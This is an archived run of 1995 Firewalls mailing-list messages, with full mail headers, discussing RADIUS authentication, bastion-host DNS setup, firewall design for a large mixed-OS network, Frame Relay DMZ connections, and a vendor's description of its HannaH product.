Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Michael Sed:

>> In something like allocating memory, where a failure is always fatal,
>> you can easily write an xmalloc() that is a wrapper which either
>> returns a non-NULL pointer or dies. Then always call that instead of
>> straight malloc(). This is fairly easy.

XtMalloc lets you do this by default, and you can override the error behavior to give you more intelligent error handling, although freeing memory after brk() is always dicey unless you use an expensive heap compaction approach.

Xt is great for programming all sorts of things, only a small part of which are windowing apps.

-Rens

From firewalls-owner Sat Sep 2 12:00:03 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA13892 for firewalls-outgoing; Sat, 2 Sep 1995 11:49:44 -0700
Received: from NYC.Heuristicrat.COM (NYC.Heuristicrat.COM [204.242.208.254]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA13885 for ; Sat, 2 Sep 1995 11:49:40 -0700
Received: (smap@localhost) by NYC.Heuristicrat.COM (8.6.11/8.6.5) id OAA10103; Sat, 2 Sep 1995 14:48:04 -0400
Received: from gigi.nyc.heuristicrat.com(192.54.131.10) by NYC.Heuristicrat.COM via smap (V1.3) id sma010101; Sat Sep 2 14:48:03 1995
Received: by gigi.NYC.Heuristicrat.COM (4.1/SMI-4.1) id AA03042; Sat, 2 Sep 95 14:48:03 EDT
Date: Sat, 2 Sep 95 14:48:03 EDT
From: chuck@NYC.Heuristicrat.COM (Chuck Ocheret)
Message-Id: <9509021848.AA03042@gigi.NYC.Heuristicrat.COM>
To: rens@imsi.com, shields@tembel.org, stockwel@sctc.com
Subject: Re: FW: Programming
Cc: firewalls@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Xt is great for programming all sorts of things, only a small part of
> which are windowing apps.

Definitely true, and even though I feel strongly about that (check out http://www.heuristicrat.com/papers/USENIX/AppDev.html) I wouldn't use Xt to write firewall code.

~chuck

Chuck Ocheret
----------------------------------------------------------
Heuristicrats Research, Inc.        +1 (914) 722-0245 [voice]
46 Andrea Lane, Suite 202           +1 (914) 722-0249 [fax]
Scarsdale, NY 10583                 chuck@NYC.Heuristicrat.COM

From firewalls-owner Sat Sep 2 12:02:45 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA13973 for firewalls-outgoing; Sat, 2 Sep 1995 11:59:12 -0700
Received: from magneto.bosch.com (magneto.bosch.com [198.111.120.52]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA13966 for ; Sat, 2 Sep 1995 11:59:08 -0700
Received: by magneto.bosch.com; id OAA23750; Sat, 2 Sep 1995 14:54:22 -0400
Received: from cyber.rbus(198.168.2.2) by magneto via smap (V1.3) id sma023748; Sat Sep 2 14:54:02 1995
Received: by inet.rbus; id OAA27630; Sat, 2 Sep 1995 14:55:58 -0400
Received: from mail(172.16.1.21) by inet.rbus via smap (V1.3) id sma027628; Sat Sep 2 14:55:54 1995
Received: by mail.fh.rbus; id OAA03825; Sat, 2 Sep 1995 14:54:44 -0400
Date: Sat, 2 Sep 1995 14:54:44 -0400
Message-Id: <199509021854.OAA03825@mail.fh.rbus>
X-Sender: cwerner@fh.rbus
X-Mailer: Windows Eudora Version 2.1.1
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@greatcircle.com
From: "Christopher L. Werner"
Subject: Re: Use of Remote Authentication: tacacs/radius/etc...
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 02:36 PM 9/1/95 -0300, Marcelo Lopes Rodrigues wrote:
>
> So why is Cisco starting to use Radius? (Packet magazine, Vol. 7, Number 2,
> Second Quarter 1995, pag. 13)
>

Well, large ISP's like Merit in Michigan are looking to RADIUS as the protocol of choice for dial-up authentication for a large network. Although you can get more information on the project from http://www.merit.edu, I can briefly say that they have over 150 member and affiliate organizations and will have every Elementary and Secondary school in the state as customers within a year (timing logistics more than anything).
We're talking millions of users, all of which can dial into PPP based Network Access Servers (NAS - Livingston Portmasters) and authenticate using RADIUS to UNIX, VMS, NT, and Novell and have regulated, auditable authentication using RADIUS encryption, UNIX password files, Kerberos, or TACACS.

Merit is one of several big users who have been bugging Cisco to adapt the RADIUS protocol as an alternative to Livingston. Cisco's reaction to that market (Merit hopes to be so successful that many other large ISP's will use the same scheme and you can authenticate back to your local authorization server from any NAS nation/world-wide :-) ) and activity on the RADIUS standard committee may have something to do with it...

--------------------------------------------------------------------
Opinions expressed are mine and not those of my employer.
--------------------------------------------------------------------
Christopher L. Werner          Robert Bosch Corporation
System Engineer                38000 Hills Tech Dr.
(810)553-1389                  Farmington Hills, MI 48331-3417

From firewalls-owner Sat Sep 2 14:32:49 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA15675 for firewalls-outgoing; Sat, 2 Sep 1995 13:42:39 -0700
Received: from intex.intex.net (intex.intex.net [204.255.96.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA15662 for ; Sat, 2 Sep 1995 13:42:36 -0700
Received: from dialupb56.intex.net (dialupb56.intex.net [204.255.103.56]) by intex.intex.net (8.6.12/8.6.12) with SMTP id PAA29162; Sat, 2 Sep 1995 15:40:50 -0500
Date: Sat, 2 Sep 1995 15:40:50 -0500
Message-Id: <199509022040.PAA29162@intex.intex.net>
X-Sender: lpierce@intex.net
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: rse@en.muc.de, firewalls@GreatCircle.COM
From: lpierce@intex.net (S. Lane Pierce)
Subject: Re: DNS forwarding problem
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 09:50 AM 9/1/95 +0200, rse@en.muc.de wrote:
> On 31 Aug 1995 01:16:55 +0200 in sdm.lists.firewalls you wrote:
> > [...]
> > You then configure all your clients INCLUDING THE BASTION/GATEWAY to resolve
> > using the internal nameserver.
> > [...]
> > The really weird part is that when the bastion/gateway wants to resolve an
> > internet name, it asks the internal, which forwards back to the bastion/gateway
> > which does the resolution and sends the answer back along the same path.
>
> I cannot understand WHY the bastion has to resolve via the internal
> nameserver. I run my bastion host via a /etc/resolv.conf which points to its
> local nameserver. And this works fine. The bastion only needs to resolve the
> name of the internal bastion and this name is in his DNS.
>
> Are there any _REAL_ security concerns about resolving the outer bastion host
> NOT via the internal bastion host?
[.sig snipped]

There is not so much a security concern here. The question is, "Does the bastion require knowledge of internal hosts that are not listed in its files?". If not, then the bastion should be configured to ask itself. This prevents a successful cracker from obtaining additional information about the inside hosts. If so, then he must be configured to ask the inside server, else the info could not be obtained. Is this clear as mud?

Good luck.

----------------------------
S. Lane Pierce
lpierce@intex.net

From firewalls-owner Sat Sep 2 15:01:12 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA18400 for firewalls-outgoing; Sat, 2 Sep 1995 14:51:12 -0700
Received: from scruz.net (nic.scruz.net [165.227.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA18386 for ; Sat, 2 Sep 1995 14:51:06 -0700
Received: from histar2.ezunx.com by scruz.net (8.6.9/1.34) id OAA27846; Sat, 2 Sep 1995 14:49:43 -0700
Date: Sat, 2 Sep 95 14:41:50 PDT
From: Rich
Subject: Large-Mixed-OS FW access problem
To: firewalls@greatcircle.com
X-Mailer: Chameleon V0.05, TCP/IP for Windows, NetManage Inc.
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello,

Got a perhaps unusual problem that perhaps I can get a few suggestions or help with. I have a network with a very large mix of OS's, and with over 6000 users who require Internet access.

The problem is this - Over 60% of the users will have to use DYNAMIC IP addresses, since there are not enough to go around, AND they are running OS/2, WFW, Apple, and a few other mixtures of OS/nos stacks. The remaining 40% will be using static IP addresses and mostly will be running WFW, but also some other mixed OS/nos base. We have a single Internet connection. Oh, and we want to authorize access with username, not ip addresses (for obvious reasons, the dhcp/bootp people).

Normally, access to the net should be pretty straightforward, but maybe I am just not thinking straight today. I can't figure out a good way to set up authorization host(s) to handle all the necessary accesses. Yes, I know I am going to have some throughput issues with such large numbers, but that is one of the reasons we want a single access point, for the security and management issues.

Comments, suggestions? Firewall recommendations? proxy/bastion suggestions?

ADVANCE

Rich Fitzgerald (408) 456-0430
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
** Remember -- Life is NOT a dress rehearsal! (nor is it a small furry animal with funny feet and floppy ears...)

From firewalls-owner Sat Sep 2 15:35:02 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA19841 for firewalls-outgoing; Sat, 2 Sep 1995 15:23:07 -0700
Received: from bastion.sware.com (bastion.sware.com [139.131.15.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA24768 for ; Fri, 1 Sep 1995 16:01:58 -0700
Received: from shlep.sware.com (shlep.sware.com [139.131.1.14]) by bastion.sware.com (8.6.12/8.6.5) with SMTP id SAA26334 for ; Fri, 1 Sep 1995 18:50:51 -0401
Received: by shlep.sware.com (5.65/2.0) from neptune.sware.com id AA14364; Fri, 1 Sep 95 18:50:15 -0400
Received: by neptune.sware.com (5.65/2.1) from localhost id AA05261; Fri, 1 Sep 95 18:51:03 -0400
Message-Id: <9509012251.AA05261@neptune.sware.com>
From: "Mark W. Reardon"
X-Mailer: SecureMail [2.1.2]
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: Re: HannaH from SecureWare Inc.
To: firewalls-digest@GreatCircle.COM
Date: Fri, 01 Sep 95 18:51:02 EDT
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

-----BEGIN PRIVACY-ENHANCED MESSAGE-----
Proc-Type: 4,MIC-CLEAR
Content-Domain: RFC822
Originator-Certificate:
 MIIBxjCCAXACFFjVVBsGH5SnHa42KUiEyt0AAAAAMA0GCSqGSIb3DQEBAgUAMFkx
 CzAJBgNVBAYTAlVTMRgwFgYDVQQKEw9TZWN1cmVXYXJlIEluYy4xFzAVBgNVBAsT
 DlNlY3VyZVdhcmUgUENBMRcwFQYDVQQLEw5FbmdpbmVlcmluZyBDQTAeFw05NTA1
 MTExMzUzNDVaFw05ODA1MTAxMzUzNDVaMHMxCzAJBgNVBAYTAlVTMRgwFgYDVQQK
 Ew9TZWN1cmVXYXJlIEluYy4xFzAVBgNVBAsTDlNlY3VyZVdhcmUgUENBMRcwFQYD
 VQQLEw5FbmdpbmVlcmluZyBDQTEYMBYGA1UEAxMPTWFyayBXLiBSZWFyZG9uMFkw
 CgYEVQgBAQICAgQDSwAwSAJBDdoErtN8vyza47fIQHiy1DCvMBhr9Wc3ByPJ/9Ek
 rKojJnyXDYzQh0JX3oOLZ0ITBCnbBM69w0DTs4aSJTQjqEcCAwEAATANBgkqhkiG
 9w0BAQIFAANBAJcyeNNIi4blzo1SjWV2sXfRQ9uhNHZ4t89hZLbCjaRYvoXjW1Uv
 XYCLO/YG1flFrXp5xOzd04+2OcLsw9RViDk=
Issuer-Certificate:
 MIIBkzCCAT0CFEbO5h6/SKxULWrq4aExKoYAAAAAMA0GCSqGSIb3DQEBAgUAMEAx
 CzAJBgNVBAYTAlVTMRgwFgYDVQQKEw9TZWN1cmVXYXJlIEluYy4xFzAVBgNVBAsT
 DlNlY3VyZVdhcmUgUENBMB4XDTk1MDUwODIwMjAxNloXDTk3MDUwNzIwMjAxNlow
 WTELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1NlY3VyZVdhcmUgSW5jLjEXMBUGA1UE
 CxMOU2VjdXJlV2FyZSBQQ0ExFzAVBgNVBAsTDkVuZ2luZWVyaW5nIENBMFkwCgYE
 VQgBAQICAgADSwAwSAJBAL4Od/KxhOB6HyUbBJC2X6Ic2P0XEcGnddzJ1QEHjSFy
 x5qzn098ScMWDEJSiwrsVmQFbNvN01hkke7ZE21aG5sCAwEAATANBgkqhkiG9w0B
 AQIFAANBALtOOv3SWxy+/VEvvY6j06wUNQRhqbtX5g8HgOwPgvoqcrRl939lcOcx
 X7q8YB5bVVTow4PsFfnorV5gsOBwnf4=
MIC-Info: RSA-MD5,RSA,
 ANBJA9k1rs8MWI2SJ1E6qO+XYsSNWbjNBK3wcslMwtCMHobUrf3zLuFxzWarDgaY
 s/A6GBr9UekszKI+UtFTX0c=

SecureWare really doesn't see Hannah as a replacement for firewalls. As some of the respondents have pointed out, a node-based solution may be more difficult to administer and scale to a large number of platforms. We've tried to make HannaH scalable by including centralized administration for distributed environments. A node based solution is a problem if it is not available on ALL of the platforms that you want to protect. We will address this problem over time as we offer HannaH on additional platforms or other vendors offer compatible products since HannaH protocols are published for anyone to implement.

A firewall is a very valid perimeter solution that is a great choke point between the "inside" and the "outside". However, there are many environments that firewalls alone simply cannot address. Some of the environments would benefit from a combined HannaH/firewall solution, which we are currently pursuing. Some could be addressed by firewalls alone, and others are simply inappropriate for HannaH. We have tried to describe some of the target markets for HannaH in a white paper that you can grab off our web page. If you have further questions about HannaH in a specific environment, you can contact SecureWare directly.

Let me reiterate, however, that HannaH is not the network security panacea. It fills an important gap and advances the state of the art in security products and (we hope) will be applicable to a wide range of environments for which there is simply no solution today.

That said, I would like to give a few brief responses to some of the comments made in the most recent postings to the list.

On Thu, 31 Aug 1995, Gary Flynn wrote:
> [...]
> Problems with firewall throughput go away.

Again, it depends on the environment. You can provide access to some applications on the "inside" directly without having to go through a firewall. You can combine HannaH with a firewall to provide protected access to the firewall and then go through your traditional proxy to get inside. If you are, for example, a large retail chain and want to have your stores post their inventory figures to a central machine over the Internet, HannaH would work just fine and you wouldn't need a firewall for that application. Just one example, . . .

> [...]
> I'd think the only problem would be possible incompatibility bugs
> with the standard API but if the API stays generally stable, those
> bugs would eventually get worked out.
>

HannaH doesn't modify the API used for communications, it instead installs below it so that no application modifications are required. This was one of the original requirements for HannaH since we did not want to get in the business of telling other software vendors that they need to rewrite the applications to make them use HannaH.

On Thu, 31 Aug 1995, David Miller wrote:
> First, there's the possibility that people will not use the product, or
> that their product will not fit all type, styles, and rev levels of
> computer on your network. Once one of the systems on your network is
> compromised it becomes a safe staging area for attacks on the rest of
> your network. Which leads us to ...

These are very valid points. Initially, HannaH is not being offered on all computing platforms. It cannot secure those platforms that it isn't running on. While it does allow connections from non-HannaH hosts, they are not secure. We recommend that HannaH systems are configured to enforce the level of security required for the environment that it is in. For example, the types of connections allowed to a non-HannaH host might be restricted to a specific set of hosts and applications. A non-HannaH host can only give you spoofable IP addresses and port numbers, and that's all HannaH can go on.

> Second, the whole reason people put the soft chewy center in the middle
> of a very hard shell is so there is a single access point to be
> administered. It's one thing to get a good security person to
> manage/monitor the firewall through which all traffic flows. It's
> another thing altogether (usually thought impossible in any sizeable
> installation) to try and have many administrators adequately secure their
> systems.

This is a good analogy and it helps to point out that there are different needs that are addressed by HannaH and Firewalls. Firewalls are perimeter protection, and one of the problems they have is authenticating the remote party. If a Firewall has HannaH running, HannaH can provide that strength. This replaces identification of remote users by IP address with something a lot harder to forge, the remote user's cryptographically authenticated identity.

Also, Firewalls do nothing against the internal attacks. That is a problem that can be addressed by securing sensitive information on HannaH systems by only allowing connections through secure, encrypted pipes. Then, even the communications between two computers in the payroll department are secured from the network trouble shooter's sniffer.

Lastly, though a node level solution, HannaH is designed with a centralized management concept. Once installed, all systems level security is configured and monitored from a central management work station. Ease of management has been a primary concern from the outset of HannaH. This includes both Access Control and Audit Information.

We don't think of HannaH as a replacement for Firewalls; it is instead a complementary tool. In addition, some businesses may have decided that a Firewall is too expensive for some application, i.e., the mobile user calling the office, the one or two computer remote office. HannaH, since it is a software solution, addresses these needs in a different way that may be more affordable.

Finally, Alan Hannan wrote in response to Gary Flynn and David Miller:
> >[...]
> Sure, let's just open up the bloody borders of our country to anyone, we
> wouldn't want to impede any travel, would we? Heaven forbid Iraqis should
> actually have to stop at the border to our country, we should allow
> them and all others to come in unimpeded. Geez.
>
> >[...]
> Quite obviously, one that thinks individual host security should have
> more emphasis than network security has never tried to implement such a
> policy. More clearly, one who thinks indiv. hosts are more important
> than network security has no concept of time=money.

We are not advocating individual host security over network security or the other way around. Both have their strengths and weaknesses. In the security for Security First Network Bank, the first Internet bank, SecureWare used filtering routers, Firewalls, Hannah, and other techniques such as secure operating systems. Clearly, strong security means analyzing the entire network and each computer on it for weakness. Then each of those weaknesses has to be addressed. HannaH and Firewalls are complementary tools to be used in such an exercise.

A few comments have also been posted regarding UDP and Kerberos. I am not a Kerberos expert and so I went to some of the other people within SecureWare that have studied it. They provided these short comments:

- ---------- Beginning of Message -----------

Kerberos: Hannah is similar to Kerberos in many ways. Probably the major differences include:

- Hannah uses public key cryptography for authentication and key management whereas Kerberos uses symmetric key management techniques that require an on-line "ticket-granting-service". The use of public key cryptography:
  - makes Hannah more robust,
  - eliminates security problems associated with mutually suspicious users having to trust a common entity,
  - allows Hannah to scale better, particularly simplifying controlled interoperability between disparate organizations.

- Hannah is installed in a system below the API (it transparently replaces the Winsock layer for Windows XX, and resides within the protocol stack for Unix). Unlike Kerberos which requires that you modify an application to obtain security, Hannah is completely transparent to applications. Web browsers, X, SMTP, ftp, telnet, rcp, rsh, etc... are all secured without modification. ALSO, because Hannah is below the API, the security administrator has the option of MANDATING security, such that it cannot be bypassed by any user or application. This cannot be done using Kerberos.

UDP: Hannah will support UDP in an early point release. Key management will not impose much of a burden upon UDP applications, for the key management process retains a security state for recent datagram sessions. Of course, if a session consists of a single datagram there will be a substantial hit, but that is the price paid for strong authentication.

Multicast: With the addition of UDP support, Hannah will support multicast using manual key management.

Multiuser Hannah and certificate diskettes: Key material for users need not reside on a protected floppy. On those systems with adequate access control, it can reside in a local file. Hannah also supports the use of smart cards, including the National Security Agency's Fortezza Card. There are plans for Hannah to support multiuser operation on Unix systems using either file-based or smart card key repositories.

Logging out: On all systems, key material is protected within a special Cryptographic Subsystem and is not accessible to an application. It is deactivated (or destroyed) when the user logs out. Perhaps a point release should include a screen saver option that automatically deactivates the key material after an appropriate interval of inactivity. Of course, the ultimate level of protection provided the key material depends upon the overall security of the underlying platform. That is why Hannah is offered on platforms including military grade B-level operating systems.

- ---------- End of Message -----------

I hope these are informative.

Mark

- -------------------------------------------------------------------------------
Mark Reardon      | SecureWare, Inc.              | WWW is http://www.secureware.com
(404)315-6296     | 2957 Clairmont Rd., Ste. 200  | email is mwr@sware.com
ext. 134          | Atlanta, GA 30329-1647        |
This letter was created using SecureMail. If you do not have a PEM reader, please ignore the privacy headers.
-----END PRIVACY-ENHANCED MESSAGE-----

From firewalls-owner Sat Sep 2 16:00:03 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA20275 for firewalls-outgoing; Sat, 2 Sep 1995 15:39:45 -0700
Received: from zeus.ci.ua.pt (zeus.ci.ua.pt [193.136.80.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA20260 for ; Sat, 2 Sep 1995 15:39:40 -0700
Received: by zeus.ci.ua.pt (1.37.109.16/16.2) id AA173114955; Sun, 3 Sep 1995 00:35:55 +0100
From: Fernando Cozinheiro
Message-Id: <199509022335.AA173114955@zeus.ci.ua.pt>
Subject: RADIUS... Where is it?
To: firewalls@greatcircle.com
Date: Sun, 3 Sep 1995 00:35:55 +0100 (PST)
Cc: cooker@zeus.ci.ua.pt (Fernando Cozinheiro)
Reply-To: Fernando.Cozinheiro@ua.pt
Organization: Universidade de Aveiro, Portugal
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 635
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Dear friends:

I'm seeing several references about Radius on this list... Could anyone tell me where I can get any document describing it and the package itself?

Thanks in advance.
--
Fernando Cozinheiro                    http://sweet.ua.pt/~cooker/
System & Network Administrator         Email: cooker@ci.ua.pt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Universidade de Aveiro                 Phone:
Centro de Informatica                    UA:   +351 34 370200/Ext.2254
3810 Aveiro                              CIUA: +351 34 370345
Portugal                               Telefax: +351 34 370214

From firewalls-owner Sat Sep 2 17:00:00 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA21419 for firewalls-outgoing; Sat, 2 Sep 1995 16:34:33 -0700
Received: from gatekeep.genmagic.com (gatekeep.genmagic.com [192.216.16.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA21412 for ; Sat, 2 Sep 1995 16:34:30 -0700
Received: from (genmagic.genmagic.com [10.1.4.12]) by gatekeep.genmagic.com (8.6.9/8.6.9) with SMTP id OAA22595; Sat, 2 Sep 1995 14:16:51 -0700
Received: from abulafia.genmagic.com by genmagic.genmagic.com (4.1/SMI-4.1/JBS) id AA06266; Sat, 2 Sep 95 16:29:20 PDT
Received: by abulafia.genmagic.com (931110.SGI/930416.SGI) for @genmagic.genmagic.com:firewalls@GreatCircle.COM id AA04163; Sat, 2 Sep 95 16:30:08 -0700
Date: Sat, 2 Sep 95 16:30:08 -0700
From: jet@abulafia.genmagic.com (J. Eric Townsend)
Message-Id: <9509022330.AA04163@abulafia.genmagic.com>
To: Rich
Cc: firewalls@GreatCircle.COM
Subject: Large-Mixed-OS FW access problem
In-Reply-To:
References:
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

my nickel's worth, now that I've bailed from our MIS department due to political differences with new management. :-)

if you haven't already, go to non-internic-assigned addresses. Take 10.*.*.*, we're using it. :-)

"raf" == Rich writes:

raf> Over 60% of the users will have to use DYNAMIC IP addresses,
raf> since there are not enough to go around, AND they are running
raf> OS/2, WFW, Apple, and a few other mixtures of OS/nos stacks.

Put the DYNAMIC addresses in their own subnet range. We did this by having 10-bit subnets and putting dynamics in their own chunk of that. Then do massive sets of automated reverse entries for *everything* in that range. (Yes it's annoying, but then you can just chunk things into that range and not worry about it.)

raf> We have a single Internet connection. Oh, and we want to
raf> authorize access with username, not ip addresses (for obvious

hm. Dunno on that one.

raf> I know I am going to have some throughput issues with such large
raf> numbers, but that is one of the reasons we want a single access
raf> point, for the security and management issues.

proxy/cache the WWW stuff and that'll help more than one would expect. (URL's get passed around the office and suddenly half the company wants to see what's so funny about www.micros0ft.com.)

dual-router with bastion/proxy hosts for various services. It's easier to handle having machines on the internet and proxy stuff this way. (ex: Our external www server is in the DMZ and is considered a 'hostile' system by the routers. This means we can spend less time/effort securing the server and more time securing the mail gateway.)

be prepared to spend a large amount of money. If the tightwads in accounting refuse, only provide the services you can afford to provide securely. This usually helps them budge, as the users complain to you, you explain "it's all the money I'm allowed to spend". (That, or departments that can business justify internet access will offer funds from their budgets.) Failing that, ask accounting how much it will cost if someone from a competitor starts reading the CEO's mail. Then show them how it's done. :-)

From firewalls-owner Sat Sep 2 22:00:05 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA24408 for firewalls-outgoing; Sat, 2 Sep 1995 21:43:13 -0700
Received: from ncelec.com ([199.238.59.23]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id VAA24401 for ; Sat, 2 Sep 1995 21:43:10 -0700
Received: by ncelec.com (5.4R3.10/200.2.1.5) id AA05496; Sat, 2 Sep 1995 21:39:22 -0700
From: "Mike Culver-Support"
Message-Id: <9509022139.ZM5494@ncelec.com>
Date: Sat, 2 Sep 1995 21:39:21 -0700
X-Mailer: Z-Mail Lite (3.2.0 26may94)
To: firewalls@greatcircle.com
Subject: Frame-Relay Net Connections
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

We all know (and some of us even agree) that a bastion host on a DMZ is the best way to protect yourself from the net. Anyone have a suggestion for sites that connect to their service provider via a Frame Relay connection? In this case, there is a virtual circuit to the service provider, but the circuit runs thru a common interface on a router that also serves WAN sites that are part of the internal network. This is a fairly common connection method!

From firewalls-owner Sat Sep 2 23:30:01 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA26177 for firewalls-outgoing; Sat, 2 Sep 1995 23:17:41 -0700
Received: from dogbert.ipa.net (dogbert.ipa.net [205.218.170.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA26170 for ; Sat, 2 Sep 1995 23:17:37 -0700
Received: (from darren@localhost) by dogbert.ipa.net (8.6.12/8.6.9) id BAA09831; Sun, 3 Sep 1995 01:25:09 -0500
From: "Darren K. Bolding"
Message-Id: <199509030625.BAA09831@dogbert.ipa.net>
Subject: Re: RADIUS... Where is it?
To: Fernando.Cozinheiro@ua.pt
Date: Sun, 3 Sep 1995 01:25:08 -0500 (CDT)
Cc: firewalls@GreatCircle.COM, cooker@zeus.ci.ua.pt
In-Reply-To: <199509022335.AA173114955@zeus.ci.ua.pt> from "Fernando Cozinheiro" at Sep 3, 95 00:35:55 am
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Content-Length: 1311
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In the previous message, Fernando Cozinheiro said:
> 
> Dear friends:
> 
> I'm seeing several references about Radius on this list...
> 
> Could anyone from where can I get any document describing it and the
> package itself?
> 
> Thanks in advance.
> 
> -- 
> Fernando Cozinheiro                 http://sweet.ua.pt/~cooker/
> System & Network Administrator      Email: cooker@ci.ua.pt
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Universidade de Aveiro              Phone:
> Centro de Informatica               UA:   +351 34 370200/Ext.2254
> 3810 Aveiro                         CIUA: +351 34 370345
> Portugal                            Telefax: +351 34 370214
> 

You can find out about the Livingston implementation of Radius at

http://www.livingston.com/products/dts_radius.htm

Merit's web archive is at:

http://home.merit.edu/webstuff/radius/

There is a fair bit of Radius tweaking going on; the Livingston Portmaster mailing list is an inappropriate place to discuss it (IMHO), but seems a popular one nonetheless.

-- 
-- Darren Bolding                  Senior network engineer       darren@bolding.org --
-- Internet Partners of America    1-800-785-4091 X106           darren@ipa.net     --
-- ISP design and implementation.  WAN, UNIX and Security consulting                --

From firewalls-owner Sun Sep 3 01:00:01 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA27135 for firewalls-outgoing; Sun, 3 Sep 1995 00:48:32 -0700
Received: from ford.gbnet.org (ford.gbnet.org [192.188.96.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA27128 for ; Sun, 3 Sep 1995 00:48:27 -0700
Received: (from steve@localhost) by ford.gbnet.org (8.7.Beta.10/8.6.12) id IAA13998; Sun, 3 Sep 1995 08:46:51 +0100 (BST)
From: Steve Kennedy
Message-Id: <199509030746.IAA13998@ford.gbnet.org>
Subject: Re: Use of Remote Authentication: tacacs/radius/etc...
To: cwerner@fh.us.bosch.com (Christopher L. Werner)
Date: Sun, 3 Sep 1995 08:46:50 +0100 (BST)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <199509021854.OAA03825@mail.fh.rbus> from "Christopher L. Werner" at Sep 2, 95 02:54:44 pm
X-Mailer: ELM [version 2.4 PL24alpha3]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

According to Christopher L. Werner
> At 02:36 PM 9/1/95 -0300, Marcelo Lopes Rodrigues wrote:
> >So why is Cisco starting to use Radius? (Packet magazine, Vol. 7, Number 2
> >, Second Quarter 1995, pag. 13)
> Well, large ISP's like Merit in Michigan are looking to RADIUS as the protocol
> of choice for dial-up authentication for a large network. Although you can

Beware of the RADIUS implementations from Livingston and Merit. There is a serious bug in the socket handling code (I think) that causes the server to get confused under heavy load. Demon Internet found this when they installed their version of the RADIUS server; they have fixed it (being an ISP with a large dial-up community does tend to stress-test these things though).

Regards

Steve
-- 
home  steve@gbnet.org        * Flat 2, 43 Howitt Road, Belsize Pk, London NW3 4LU
work  steve@demon.net        * tel +44-(0)171 483 1169    FAX +44-(0)181 444 6103
www   http://www.gbnet.net/  * GSM mobile +44-(0)802 444 500
bits  steve@gbnet.net        * GSM data @2400 0802-449500 @9600 449501 fax 449502
Euro firewall info - send mail to majordomo@gbnet.net (subscribe firewalls-uk)

From firewalls-owner Sun Sep 3 13:00:02 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA06946 for firewalls-outgoing; Sun, 3 Sep 1995 12:38:49 -0700
Received: from mailer.gu.se (mailer.gu.se [130.241.150.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA06939 for ; Sun, 3 Sep 1995 12:38:45 -0700
Received: from mail2gsv.gu.se (mail2gsv.gu.se [193.10.79.11]) by mailer.gu.se (8.6.10/8.6.10) with ESMTP id VAA20687 for ; Sun, 3 Sep 1995 21:37:23 +0200
Received: from gsv.gu.se (mail2gu.gsv.se [146.21.73.101]) by mail2gsv.gu.se (8.6.11/8.6.9) with ESMTP id VAA11428 for ; Sun, 3 Sep 1995 21:17:48 +0200
Received: from pc_emi_18 (pc_emi_18 [146.21.73.218]) by gsv.gu.se (8.6.11/8.6.11) with SMTP id VAA29975 for ; Sun, 3 Sep 1995 21:37:23 +0200
Message-Id: <199509031937.VAA29975@gsv.gu.se>
X-Sender: harald@146.21.73.101
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Date: Sun, 03 Sep 1995 21:20:25 +0100
